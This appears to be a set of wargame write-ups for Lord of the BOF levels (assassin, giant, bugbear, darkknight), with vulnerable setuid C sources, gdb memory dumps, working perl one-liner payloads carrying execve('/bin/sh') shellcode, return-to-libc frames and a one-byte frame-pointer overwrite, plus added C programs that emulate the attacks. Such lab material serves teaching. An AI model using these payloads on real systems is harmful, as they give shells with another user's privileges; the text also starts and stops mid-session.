0xbffffc54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc84:     0x90909090      0x90909090      0x90909090      0xc289c031
0xbffffc94:     0x2f6e6850      0x2f686873      0x8969622f      0xb0c189e3
0xbffffca4:     0x5351520b      0x80cde189      0x53454c00      0x45504f53
0xbffffcb4:     0x2f7c3d4e      0x2f727375      0x2f6e6962      0x7373656c
0xbffffcc4:     0x65706970      0x2068732e      0x55007325      0x4e524553
0xbffffcd4:     0x3d454d41      0x53494800      0x5a495354      0x30313d45
0xbffffce4:     0x48003030      0x4e54534f      0x3d454d41      0x61636f6c
0xbffffcf4:     0x736f686c      0x6f6c2e74      0x646c6163      0x69616d6f
0xbffffd04:     0x4f4c006e      0x4d414e47      0x69673d45      0x00746e61
0xbffffd14:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239
0xbffffd24:     0x322e3836      0x312e3232      0x49414d00      0x762f3d4c
0xbffffd34:     0x732f7261      0x6c6f6f70      0x69616d2f      0x69672f6c
0xbffffd44:     0x00746e61      0x4d524554      0x6574783d      0x48006d72
0xbffffd54:     0x5454534f      0x3d455059      0x36383369      0x54415000
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
[giant@localhost tmp]$
[giant@localhost tmp]$ r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
bash: r: command not found
[giant@localhost tmp]$ bash2
[giant@localhost tmp]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`

bash$ id
uid=514(giant) gid=514(giant) groups=514(giant)
bash$ q
sh: q: command not found
bash$ exit
exit
[giant@localhost tmp]$ cd ../
[giant@localhost giant]$ ls
assassin  assassin.c  tmp
[giant@localhost giant]$ finger
Login     Name       Tty      Idle  Login Time   Office     Office Phone
giant                pts/0          Jul 30 18:48 (192.168.222.1)
[giant@localhost giant]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`

bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$
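The two frame tricks above, emulated: an added example for this page, not code from the posts. It models only main()'s own `leave; ret` epilogue, the `leave; ret` gadget 0x080484df used against zombie_assassin and the `ret` gadget 0x0804851e used against assassin, over a byte array standing in for the stack. Addresses marked (page) are taken from the sessions above; the buffer address, the NOP sled address and the stack word that ends the ret sled are assumptions chosen so everything fits in one array (in the real run that word is whatever the caller left above main's frame, which is why the number of rets had to be tuned by hand).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_BASE 0xbffffa00u   /* lowest address modelled (assumption) */
#define STACK_SIZE 0x300u        /* covers up to 0xbffffd00 */
#define BUF        0xbffffb40u   /* main()'s buffer[40] (assumption) */
#define ARGV1      0xbffffbf3u   /* argv[1] string, as the gdb session shows (page) */
#define NOP_SLED   0xbffffc40u   /* where argv[2]'s NOPs would sit (assumption) */
#define LEAVE_RET  0x080484dfu   /* "leave; ret" gadget, zombie_assassin (page) */
#define RET        0x0804851eu   /* "ret" gadget, assassin (page) */
#define SYSTEM     0x40058ae0u   /* system() in the target libc (page) */
#define BINSH      0x400fbff9u   /* "/bin/sh" in the target libc (page) */

struct cpu { uint32_t eip, esp, ebp; int gadgets; };

static uint8_t stack[STACK_SIZE];

static uint32_t ld(uint32_t a) { uint32_t v; memcpy(&v, stack + (a - STACK_BASE), 4); return v; }
static void     st(uint32_t a, uint32_t v) { memcpy(stack + (a - STACK_BASE), &v, 4); }
static void     sb(uint32_t a, const void *p, size_t n) { memcpy(stack + (a - STACK_BASE), p, n); }
static uint8_t *put32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); return p + 4; }

static uint32_t pop(struct cpu *c) { uint32_t v = ld(c->esp); c->esp += 4; return v; }
/* leave; ret == mov esp, ebp; pop ebp; pop eip */
static void leave_ret(struct cpu *c) { c->esp = c->ebp; c->ebp = pop(c); c->eip = pop(c); }

/* Run main()'s epilogue with ebp at its saved-ebp slot, then keep executing
 * while eip is one of the two gadgets. Stops at the first other target. */
static struct cpu run(void) {
    struct cpu c = { 0, BUF + 40, BUF + 40, 0 };
    leave_ret(&c);
    while (c.gadgets < 1000) {
        if (c.eip == LEAVE_RET) leave_ret(&c);
        else if (c.eip == RET)  c.eip = pop(&c);
        else break;
        c.gadgets++;
    }
    return c;
}

/* zombie_assassin payload from the page: "aaaa", system, "bbbb", &"/bin/sh",
 * 24*'b', fake ebp = address of argv[1] itself, then the leave;ret gadget. */
static size_t fake_frame_payload(uint8_t *out) {
    uint8_t *p = out;
    memcpy(p, "aaaa", 4); p += 4;           /* popped into ebp by the gadget */
    p = put32(p, SYSTEM);                    /* popped into eip by the gadget */
    memcpy(p, "bbbb", 4); p += 4;           /* system()'s return address */
    p = put32(p, BINSH);                     /* system()'s argument */
    memset(p, 'b', 24);  p += 24;            /* rest of buffer[40] */
    p = put32(p, ARGV1);                     /* saved-ebp slot */
    p = put32(p, LEAVE_RET);                 /* return-address slot */
    return (size_t)(p - out);                /* 48 bytes */
}

struct cpu demo_fake_frame(void) {
    uint8_t pl[64];
    size_t n = fake_frame_payload(pl);
    memset(stack, 0, sizeof stack);
    sb(BUF, pl, n);      /* strcpy(buffer, argv[1]) */
    sb(ARGV1, pl, n);    /* the argv[1] string itself, higher up the stack */
    return run();
}

/* assassin payload from the page: 37 copies of the ret gadget. Once the
 * overflowed frame is used up, esp walks into whatever the caller left on
 * the stack; a planted pointer into a NOP sled stands in for that word. */
struct cpu demo_ret_sled(void) {
    uint8_t pl[37 * 4], nops[64];
    for (int i = 0; i < 37; i++) put32(pl + 4 * i, RET);
    memset(nops, 0x90, sizeof nops);
    memset(stack, 0, sizeof stack);
    sb(BUF, pl, sizeof pl);
    st(BUF + sizeof pl, NOP_SLED);          /* stand-in for the caller's word (assumption) */
    sb(NOP_SLED, nops, sizeof nops);
    return run();
}

int main(void) {
    struct cpu a = demo_fake_frame();
    printf("fake frame: eip=%#x esp=%#x [esp]=%#x [esp+4]=%#x after %d gadget(s)\n",
           (unsigned)a.eip, (unsigned)a.esp, (unsigned)ld(a.esp), (unsigned)ld(a.esp + 4), a.gadgets);
    struct cpu b = demo_ret_sled();
    printf("ret sled  : eip=%#x esp=%#x after %d gadget(s)\n",
           (unsigned)b.eip, (unsigned)b.esp, b.gadgets);
    return 0;
}
```

The fake-frame run ends at system() with "bbbb" at [esp] and &"/bin/sh" at [esp+4], which is what the gdb dump at 0xbffffbf3 confirmed; the ret-sled run executes 26 `ret`s before it pops the planted word and leaves the gadget loop.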


7. 2014.02.20 bugbear -> giant

The challenge is as follows.


[bugbear@localhost tmp]$ cat ../giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

Here only execve() may be used as the return target.

execve() takes three arguments: the path to run, an argv pointer, and envp. argv has to point at an array whose first element is a pointer to the path and whose second element is NULL; envp may be NULL.

So the frame has to look like execve("/bin/sh", {&"/bin/sh", NULL}, 0), which means finding, somewhere in memory, a pointer to "/bin/sh" that is immediately followed by four NUL bytes.
At first I tried putting the address of /bin/sh into an environment variable R and a huge run of NULs into R2.

0xbffffdca:      "R2="
0xbffffdce:      "USER=bugbear"
0xbffffddb:      "BASH_ENV=/home/bugbear/.bashrc"
0xbffffdfa:      "LANG=en_US"
0xbffffe05:      "R=u¿\017@"
0xbffffe0c:      "OSTYPE=Linux"
0xbffffe19:      "SHLVL=1"

But the variables did not end up at the addresses I intended.
I then tried naming the variable Z, the last letter of the alphabet, hoping it would be placed right next to the NULs at the top of the stack,
but that was a misconception:
I assumed the bytes in between would be NUL, but other data was there.

0xbffffe12:      "Z=u¿\017@"
0xbffffe19:      "SHLVL=1"
0xbffffe21:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;---Type <return> to continue, or q <return> to quit---
32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffee9:      ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb1:      "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe4:      "/home/bugbear/tmp/giant"
0xbffffffc:      ""

So I turned to argv instead.
The program path (argv[0]) also leaves a copy at the very top of the stack,

as in 0xbfffffe4: "/home/bugbear/tmp/giant" above: that string ends at 0xbffffffb, right below the zero word that closes the stack at 0xbffffffc.
So rename the binary so that its filename is the four address bytes of the "/bin/sh" string, and point execve's argv at the place in that path string where the four bytes sit.

For argv the pointer has to be followed immediately by a NULL entry; here the string's terminating NUL and the zero bytes at the top of the stack supply it, and envp can simply point at the zero word at 0xbffffffc.

./`perl -e 'print "\xf9\xbf\x0f\x40"'` "`perl -e 'print "\x48\x9d\x0a\x40"x12,"\xe0\x91\x03\x40","\xf9\xbf\x0f\x40","\xf7\xff\xff\xbf","\xfc\xff\xff\xbf"'`"

The binary is run as ./<four bytes of 0x400fbff9>, so the path string "./\xf9\xbf\x0f\x40" occupies 0xbffffff5..0xbffffffb and the address bytes start at 0xbffffff7. argv[1] is twelve copies of the execve address 0x400a9d48 (the one at offset 44 is the saved return address the binary checks), a libc address for execve to return into, and then execve's three arguments: path = 0x400fbff9 ("/bin/sh" inside libc), argv = 0xbffffff7, envp = 0xbffffffc.
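The frame and the stack-top pointers, as an added example that is not code from the original post or from the LOB sources. It models where the kernel leaves the program path right below the final zero word of the stack, builds argv[1] byte for byte the way the one-liner does, and applies the same check assassin.c makes on offset 44. All addresses are the ones in the payload above, used as sample input; nothing is looked up from a live libc.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Sample values taken from the payload above (LOB giant box); they are only
 * input to this model and are not resolved at run time. */
#define EXECVE_ADDR 0x400a9d48u   /* execve in libc, what assassin computes via ldd + nm */
#define AFTER_ADDR  0x400391e0u   /* libc address execve would return to (it never does) */
#define BINSH_ADDR  0x400fbff9u   /* "/bin/sh" string inside libc                       */
#define STACK_TOP   0xc0000000u   /* end of the user stack on this box                  */
#define FRAME_LEN   64

/* Little-endian stores/loads, the byte order the perl one-liner spells out. */
static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Where the kernel leaves the program path on the initial stack: the string
 * ends right below the four zero bytes at the top (0xbffffffc), as the gdb
 * dump above shows for "/home/bugbear/tmp/giant" at 0xbfffffe4. */
struct stack_top {
    uint32_t path;   /* first byte of the path string ("./...")          */
    uint32_t argv;   /* the four address bytes after "./": our argv[0]   */
    uint32_t envp;   /* the zero word at the top, usable as a NULL envp  */
};

static struct stack_top model_stack_top(const char *path, uint32_t top) {
    struct stack_top s;
    s.envp = top - 4;
    s.path = s.envp - (uint32_t)(strlen(path) + 1);   /* path plus its NUL */
    s.argv = s.path + 2;                               /* skip "./"         */
    return s;
}

/* Lay out argv[1] the way the one-liner does:
 *   [0..39] buffer  [40..43] sfp  [44..47] ret = execve
 *   [48..51] execve's own return address
 *   [52] path  [56] argv  [60] envp            (execve's three arguments) */
static size_t build_execve_frame(uint8_t *out, uint32_t execve_addr, uint32_t after,
                                 uint32_t path, uint32_t argv, uint32_t envp) {
    int i;
    for (i = 0; i < 12; i++)          /* filler, sfp and ret: all the execve address */
        put32(out + 4 * i, execve_addr);
    put32(out + 48, after);
    put32(out + 52, path);
    put32(out + 56, argv);
    put32(out + 60, envp);
    return FRAME_LEN;
}

/* The test assassin.c performs: argv[1][44..47] must equal the execve address. */
static int passes_ret_check(const uint8_t *frame, uint32_t execve_addr) {
    return get32(frame + 44) == execve_addr;
}

/* argv[1] goes through strcpy, so an embedded zero byte would truncate it. */
static int has_embedded_nul(const uint8_t *frame, size_t len) {
    size_t i;
    for (i = 0; i < len; i++)
        if (frame[i] == 0) return 1;
    return 0;
}

int main(void) {
    uint8_t frame[FRAME_LEN];
    size_t i, n;
    /* the binary was started as ./<4 address bytes>, so this is its path string */
    struct stack_top s = model_stack_top("./\xf9\xbf\x0f\x40", STACK_TOP);

    n = build_execve_frame(frame, EXECVE_ADDR, AFTER_ADDR, BINSH_ADDR, s.argv, s.envp);
    printf("path %08x  argv %08x  envp %08x\n",
           (unsigned)s.path, (unsigned)s.argv, (unsigned)s.envp);
    printf("ret check: %s, embedded NUL: %s\n",
           passes_ret_check(frame, EXECVE_ADDR) ? "pass" : "fail",
           has_embedded_nul(frame, n) ? "yes" : "no");
    for (i = 0; i < n; i++)
        printf("\\x%02x%s", frame[i], (i % 16 == 15) ? "\n" : "");
    return 0;
}
```

The model reproduces the two pointers in the payload (argv = 0xbffffff7, envp = 0xbffffffc) from nothing but the path string and the stack top, which is the check to run before trying a different filename length: two more bytes in the path move both pointers.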
  


Posted by windowhan

A basic RTL (return-to-libc) problem.

In terms of difficulty it is even easier than the previous one, haha.

I used system().


The challenge is as follows.


[darkknight@localhost darkknight]$ cat bugbear.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}


The code that locates the "/bin/sh" string inside libc (scanning forward from system()) is as follows.


#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
       long shell;
       shell = 0x40058ae0; /* address of system() in this libc; scan forward from here */

       /* compare 8 bytes so the match includes the terminating NUL of "/bin/sh" */
       while(memcmp((void *)shell, "/bin/sh", 8)) shell++;
       printf("\"/bin/sh\" is at 0x%lx\n", shell);
       return 0;
}




[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\xe0\x8a\x05\x40"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
bash$ my-pass
euid = 513
new divide

This worked because the box is Red Hat 6.2: the system() in its libc has no getuid() check, so the shell it spawns keeps the setuid euid.
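The scan, the frame and the filter, as an added example that is not code from the original post. It runs a bounded version of the search loop above over a constructed stand-in for libc (the image contents are made up; the real scan reads the live mapping starting at system()), builds argv[1] as the one-liner does, and applies the argv[1][47] != 0xbf test the binary makes, which is why a libc address (0x40......) passes where a stack address (0xbf......) would not. The addresses are the writeup's.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values from the writeup, used only as sample input. */
#define SYSTEM_ADDR 0x40058ae0u
#define FRAME_LEN   56

/* Constructed stand-in for a slice of libc starting at system(): filler
 * bytes with "/bin/sh\0" planted 0x80 bytes in. */
static uint8_t fake_libc[0x100];
static void make_fake_libc(void) {
    size_t i;
    for (i = 0; i < sizeof fake_libc; i++) fake_libc[i] = (uint8_t)(0x90 + (i & 7));
    memcpy(fake_libc + 0x80, "/bin/sh", 8);
}

/* Bounded version of the author's loop: scan [img, img+len) for needle
 * including its NUL and return base + offset, or 0 when it is absent
 * (the unbounded loop above would walk off the mapping and crash). */
static uint32_t find_string(const uint8_t *img, size_t len, uint32_t base, const char *needle) {
    size_t n = strlen(needle) + 1, i;
    for (i = 0; i + n <= len; i++)
        if (memcmp(img + i, needle, n) == 0) return base + (uint32_t)i;
    return 0;
}

static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* argv[1] as the one-liner builds it:
 *   [0..39] buffer  [40..43] sfp  [44..47] ret = system
 *   [48..51] "aaaa": system's own return address (a crash once the shell exits)
 *   [52..55] pointer to "/bin/sh", system's single argument */
static size_t build_system_frame(uint8_t *out, uint32_t system_addr, uint32_t binsh_addr) {
    int i;
    for (i = 0; i < 12; i++) put32(out + 4 * i, system_addr);
    put32(out + 48, 0x61616161u);
    put32(out + 52, binsh_addr);
    return FRAME_LEN;
}

/* bugbear's only filter: argv[1][47], the top byte of the return address,
 * must not be 0xbf.  Stack addresses fail it, libc addresses pass. */
static int passes_bugbear_check(const uint8_t *frame) {
    return frame[47] != 0xbf;
}

int main(void) {
    uint8_t frame[FRAME_LEN];
    uint32_t binsh;
    size_t i;
    make_fake_libc();
    binsh = find_string(fake_libc, sizeof fake_libc, SYSTEM_ADDR, "/bin/sh");
    printf("\"/bin/sh\" is at 0x%08x\n", (unsigned)binsh);
    build_system_frame(frame, SYSTEM_ADDR, binsh);
    printf("argv[1][47] = 0x%02x -> %s\n", frame[47],
           passes_bugbear_check(frame) ? "passes" : "stack betrayed you!!");
    for (i = 0; i < FRAME_LEN; i++)
        printf("\\x%02x%s", frame[i], (i % 16 == 15) ? "\n" : "");
    return 0;
}
```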


Posted by windowhan


First, the source:

[golem@localhost golem]$ cat darkknight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkknight
        - FPO
*/

#include <stdio.h>
#include <stdlib.h>

void problem_child(char *src)
{
        char buffer[40];
        strncpy(buffer, src, 41);
        printf("%s\n", buffer);
}

main(int argc, char *argv[])
{
        if(argc<2){
                printf("argv error\n");
                exit(0);
        }

        problem_child(argv[1]);
}



The hint at the top says FPO, a frame pointer overwrite: the saved frame pointer (sfp) is what gets corrupted here. (I had read it as "stack Frame Pointer Operation"; in any case it is not SFPO, haha.)


0x8048440 <problem_child>:      push   %ebp
0x8048441 <problem_child+1>:    mov    %esp,%ebp


This is the function prologue,
the part that saves the caller's ebp (the sfp).

We are inside problem_child, called from main; the saved value is what lets the function find main's base pointer again when it returns.

If problem_child returns with a tampered sfp,
its leave; ret sequence, that is

mov %ebp,%esp
pop %ebp

followed by ret, loads the tampered value into ebp.

Nothing breaks yet: esp is set to ebp, the pop moves esp up by 4, and problem_child's ret still pops the genuine return address into main. But when main executes its own leave, esp becomes the tampered ebp, the pop moves it up by 4, and main's ret pops its return address from there.

So the word at (tampered sfp) + 4 is what main returns to.

That mirrors the normal case: problem_child's saved ebp (main's ebp, the sfp from main's point of view) + 4 is exactly where main's real return address lives.

Here strncpy(buffer, src, 41) writes one byte past the 40-byte buffer, so only the lowest byte of the sfp can be changed.


(gdb) disas problem_child
Dump of assembler code for function problem_child:
0x8048440 <problem_child>:      push   %ebp
0x8048441 <problem_child+1>:    mov    %esp,%ebp
0x8048443 <problem_child+3>:    sub    $0x28,%esp
0x8048446 <problem_child+6>:    push   $0x29
0x8048448 <problem_child+8>:    mov    0x8(%ebp),%eax
0x804844b <problem_child+11>:   push   %eax
0x804844c <problem_child+12>:   lea    0xffffffd8(%ebp),%eax
0x804844f <problem_child+15>:   push   %eax
0x8048450 <problem_child+16>:   call   0x8048374 <strncpy>
0x8048455 <problem_child+21>:   add    $0xc,%esp
0x8048458 <problem_child+24>:   lea    0xffffffd8(%ebp),%eax
0x804845b <problem_child+27>:   push   %eax
0x804845c <problem_child+28>:   push   $0x8048500
0x8048461 <problem_child+33>:   call   0x8048354 <printf>
0x8048466 <problem_child+38>:   add    $0x8,%esp
0x8048469 <problem_child+41>:   leave
0x804846a <problem_child+42>:   ret
0x804846b <problem_child+43>:   nop
End of assembler dump.
(gdb) b *problem_child+38
Breakpoint 2 at 0x8048466
(gdb) r `perl -e 'print "A"x40'`
Starting program: /home/golem/tmp/darkknight `perl -e 'print "A"x40'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, 0x8048466 in problem_child ()
(gdb) x/100x $ebp
0xbffff9ac:     0xbffff900      0x0804849e      0xbffffb2f      0xbffff9d8
0xbffff9bc:     0x400309cb      0x00000002      0xbffffa04      0xbffffa10
0xbffff9cc:     0x40013868      0x00000002      0x08048390      0x00000000
0xbffff9dc:     0x080483b1      0x0804846c      0x00000002      0xbffffa04
0xbffff9ec:     0x080482e4      0x080484dc      0x4000ae60      0xbffff9fc
0xbffff9fc:     0x40013e90      0x00000002      0xbffffb14      0xbffffb2f
0xbffffa0c:     0x00000000      0xbffffb58      0xbffffb7a      0xbffffb84
0xbffffa1c:     0xbffffb92      0xbffffbb1      0xbffffbbf      0xbffffbd8
0xbffffa2c:     0xbffffbf3      0xbffffc12      0xbffffc1d      0xbffffc2b
0xbffffa3c:     0xbffffc6c      0xbffffc7f      0xbffffc90      0xbffffca5
0xbffffa4c:     0xbffffcae      0xbffffcbe      0xbffffcc9      0xbffffdbd
0xbffffa5c:     0xbffffdda      0xbffffde6      0xbffffdf1      0xbffffe02
0xbffffa6c:     0xbffffe16      0xbffffe1e      0x00000000      0x00000003
0xbffffa7c:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffa8c:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffa9c:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffaac:     0x08048390      0x0000000b      0x000001ff      0x0000000c
0xbffffabc:     0x000001ff      0x0000000d      0x000001ff      0x0000000e
0xbffffacc:     0x000001ff      0x00000010      0x0febfbff      0x0000000f
0xbffffadc:     0xbffffb0f      0x00000000      0x00000000      0x00000000
0xbffffaec:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffafc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb0c:     0x69000000      0x00363836      0x6d6f682f      0x6f672f65
0xbffffb1c:     0x2f6d656c      0x2f706d74      0x6b726164      0x67696e6b
0xbffffb2c:     0x41007468      0x41414141      0x41414141      0x41414141
0xbffffb3c:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb4c:     0x41414141      0x41414141      0x00414141      0x5353454c


You can see the attacker's input at 0xbffffb2f.. (the argv[1] string) and, copied by strncpy, at 0xbffff984.. (buffer). Note that the saved ebp at 0xbffff9ac already reads 0xbffff900: the input was only 40 bytes, so strncpy's 41st byte was a NUL pad that zeroed its low byte.

Since one byte of the SFP can be controlled, overwrite it so the SFP points into memory that holds addresses of our choosing.
The current ebp is 0xbffff9ac, so by changing its last byte anything from 0xbffff900 to 0xbffff9ff is reachable.


(gdb) x/100x $ebp-200
0xbffff8e4:     0x4001ad70      0x400143e0      0x00000003      0x40014650
0xbffff8f4:     0x00000001      0xbffff910      0x08048170      0x400140d4
0xbffff904:     0x078e530f      0xbffff98c      0xbffff944      0x4000a7fd
0xbffff914:     0x400143d0      0x400146b0      0x00000007      0x4000a74e
0xbffff924:     0x401081ec      0x4000ae60      0xbffffa04      0x400143e0
0xbffff934:     0x40021df0      0x401088c0      0x4002982c      0x40021df0
0xbffff944:     0xbffff974      0x4000a970      0xbffffb58      0xbffff9ac
0xbffff954:     0x4005d920      0x400143e0      0xbffff974      0x40066070
0xbffff964:     0x40106980      0x08048500      0xbffff984      0x401081ec
0xbffff974:     0xbffff9ac      0x08048466      0x08048500      0xbffff984
0xbffff984:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff994:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff9a4:     0x41414141      0x41414141 
     0xbffff900      0x0804849e
0xbffff9b4:     0xbffffb2f      0xbffff9d8      0x400309cb      0x00000002
0xbffff9c4:     0xbffffa04      0xbffffa10      0x40013868      0x00000002
0xbffff9d4:     0x08048390      0x00000000      0x080483b1      0x0804846c
0xbffff9e4:     0x00000002      0xbffffa04      0x080482e4      0x080484dc
0xbffff9f4:     0x4000ae60      0xbffff9fc      0x40013e90      0x00000002
0xbffffa04:     0xbffffb14      0xbffffb2f      0x00000000      0xbffffb58
0xbffffa14:     0xbffffb7a      0xbffffb84      0xbffffb92      0xbffffbb1
0xbffffa24:     0xbffffbbf      0xbffffbd8      0xbffffbf3      0xbffffc12
0xbffffa34:     0xbffffc1d      0xbffffc2b      0xbffffc6c      0xbffffc7f
0xbffffa44:     0xbffffc90      0xbffffca5      0xbffffcae      0xbffffcbe
0xbffffa54:     0xbffffcc9      0xbffffdbd      0xbffffdda      0xbffffde6
0xbffffa64:     0xbffffdf1      0xbffffe02      0xbffffe16      0xbffffe1e
(gdb)


The run of 0x41414141 from 0xbffff984 to 0xbffff9ab (highlighted in red in the original dump) is the data copied into buffer.
Instead of 'A's, fill it with ten copies of the address of an environment variable that holds shellcode, and let the 41st byte replace the low byte of the sfp with a value inside that run: the payload below uses 0xa4, so main's ret pops 0xbffff9a8, the tenth copy (0x84 would work as well, popping the second copy from 0xbffff988).


[golem@localhost golem]$ ./darkknight `perl -e 'print "\xd1\xfd\xff\xbf"x10,"\xa4"'`
Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿¤uy¿ž-uy¿euy¿E  @
bash$ my-pass
euid = 512
new attacker
bash$
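The one-byte overwrite traced step by step, as an added example that is not code from the original post. It models problem_child's and main's frames at the addresses the gdb dump shows, applies strncpy(buffer, src, 41) and then the two leave/ret sequences, and reports where main finally returns. The frame addresses are the ones from the gdb session and may shift slightly outside gdb, which is exactly why the payload repeats its target address ten times instead of once.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout as the gdb dump above shows it. */
#define MODEL_BASE 0xbffff980u
#define MODEL_SIZE 0x40u
#define BUF_ADDR   0xbffff984u   /* char buffer[40] in problem_child             */
#define PC_EBP     0xbffff9acu   /* problem_child's saved ebp (the sfp)          */
#define MAIN_EBP   0xbffff9b8u   /* main's ebp: the value the sfp normally holds */

static uint8_t mem[MODEL_SIZE];

static int in_model(uint32_t a) {
    return a >= MODEL_BASE && a + 4 <= MODEL_BASE + MODEL_SIZE;
}
static uint32_t rd32(uint32_t a) {
    const uint8_t *p;
    if (!in_model(a)) return 0;           /* unmodelled memory: treat as a crash */
    p = mem + (a - MODEL_BASE);
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint32_t a, uint32_t v) {
    uint8_t *p = mem + (a - MODEL_BASE);
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static void reset_frames(void) {
    memset(mem, 0, sizeof mem);
    wr32(PC_EBP,       MAIN_EBP);       /* sfp                              */
    wr32(PC_EBP + 4,   0x0804849eu);    /* return into main (from the dump) */
    wr32(MAIN_EBP,     0xbffff9d8u);    /* main's own sfp                   */
    wr32(MAIN_EBP + 4, 0x400309cbu);    /* main's real return address       */
}

/* Emulate strncpy(buffer, src, 41) followed by "leave; ret" in problem_child
 * and then in main.  Returns the address main finally returns to, or 0 when
 * the forged frame pointer leads outside the modelled stack. */
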